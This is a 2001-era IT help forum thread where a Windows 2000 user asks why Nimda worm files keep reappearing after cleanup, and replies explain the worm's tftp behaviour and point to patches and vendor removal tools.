We help IT Professionals succeed at work.

Nimda Removal Probs

AntBon
AntBon asked
on
Medium Priority
281 Views
Last Modified: 2010-04-13
Hi

I have a Win2K Pro (with IIS installed as a seperate component, it is not standard with Win2K Pro !) SP2 machine with IE6.0 and Outlook Express 6.0. My virus checker if F-Secure 5.30 (with the very latest virus signatures). I have run the F-Secure and completely cleaned my machine as it WAS infected, but F-Secure now tells me it is clean !

I have downloaded the Microsoft patches from the Microsoft web pages, when i go to install the patches a messagebox tells me that the version of the software/Operating system dont require the patches (this is also confirmed in the Microsoft literature).

MY PROBLEM is that when i surf the net and go to my usual pages (just football forums), the virus checker often tells me that 'Nimda' has been found in C:\Inetpub\Scripts\TFTP656 etc....

How can this be, if i have the latest patches and the F-secure it updated aswell.

What have i missed out !!
Comment
Watch Question

Commented:
If you take a look at the IIS log files under \WINNT\System32\Logfiles\W3SVC ... you can get an idea about what had been done.

In short, this type of intrusion utilizes a well known relative path buffer overflow voluneribility to gain access to CMD.EXE ! (Who the hell is maintaining the code in Microsoft !!!)

Then, this particular worm uses tftp to download a file called Admin.dll and leave it under your C:\ D:\ waiting for activation ......

You can imagine if this worm can do more things than TFTP, such as running a flight simulator and ...

So, if you have found Admin.dll in your root directory, that's the signature and evidence !

I don't know how M$ is going to say about this but I'm going for the Apache on Linux from now on.

God bless you.

Author

Commented:
I did have the Admin.dll in my root directory, and i have cleaned my machine up as per instructions provided by F-Secure, but as i say i keep getting the TFTP files appearing when i am on line and obviously they get detected by F-Secure.  Why is this still happening when i have installed the latest patches and what are the TFTP files?

Author

Commented:
I did have the Admin.dll in my root directory, and i have cleaned my machine up as per instructions provided by F-Secure, but as i say i keep getting the TFTP files appearing when i am on line and obviously they get detected by F-Secure.  Why is this still happening when i have installed the latest patches and what are the TFTP files?

Commented:
Why don't you just delete these files:

C:\Inetpub\Scripts\TFTP ...

These are what the worm had left behind.

Commented:
Add, as I have said, "this particular worm uses tftp to download a file called Admin.dll and leave it under your C:\ D:\ waiting for activation ......"

I can't explain what tftp is without writing a whole chapter. Please ask Google.com .
CERTIFIED EXPERT
Commented:
AntBon,

Here's a site that has a Nimda Removal Tool.  I've never heard of this company, but I ran it on a test server that happened to get infected and it seems to be clean. The server's been unplugged from the network ever since it became infected.

http://www.antivirusexpert.com/removal_tools.html

If you don't want to give your email address, just download it directly from:

http://www.centralcommand.com/ts/00D709001aet/antinimda.exe

Dennis

Commented:
In addition to the Nimda patches, did you also install the CodeRed II patches?  Both Nimda and CodeRed II are viral worms. They both create zillions of files and slow down your connection speed.  They also infect everyone in your mailbox.

Commented:
What's going on on on .....
ijf

Commented:
I had the exact same problem on my machine with win2k and IE6 etc etc. The only thing different is that I was using Norton Antivirus with the latest updates of virus definitions. After I continuosly ran the checker and the results were negative, I would get messages constantly about those "TFTP" files and Admin.dll. By this time I downloaded McAfee (a registered version by the way) and that wouldnt clean it either.

Norton (symantec.com) finally posted a removal tool that worked on my computer, and I havent been infected since.

Good Luck.

FYI - I didnt loose any information or have to replace any system files [that I know of], the removal tool works great, and I believe it is free.
ijf

Commented:
I had the exact same problem on my machine with win2k and IE6 etc etc. The only thing different is that I was using Norton Antivirus with the latest updates of virus definitions. After I continuosly ran the checker and the results were negative, I would get messages constantly about those "TFTP" files and Admin.dll. By this time I downloaded McAfee (a registered version by the way) and that wouldnt clean it either.

Norton (symantec.com) finally posted a removal tool that worked on my computer, and I havent been infected since.

Good Luck.

FYI - I didnt loose any information or have to replace any system files [that I know of], the removal tool works great, and I believe it is free.

Commented:
First of all, I never heard of "F-secure".  Are you networked to other computers?  If you are, the other pcs have the virus, too!  TFTP stands for Trivial File Transfer Protocol.

The Symantec tool can be found at http://securityresponse.symantec.com/avcenter/venc/data/w32.nimda.a@mm.removal.tool.html

Trend Microsystems also offers FREE removal tools for the many mutations of Nimda, and its partner worm "Code Red".  You should disable your current antivirus program FIRST.  Download the Symantec patch/patches; then get a free month of PCillin from Trend and update and run it.

Be sure to quarantine your viruses, and send them to F-secure!  You might also read your documentation that F-secure supplies.  It may have specific instructions on what to do if it continues to show you a virus file.  You may have your settings on "Alert" rather than "repair", or "quarantine", or "remove".  

Re-read my instructions, and apply them before you respond.

Explore More ContentExplore courses, solutions, and other research materials related to this topic.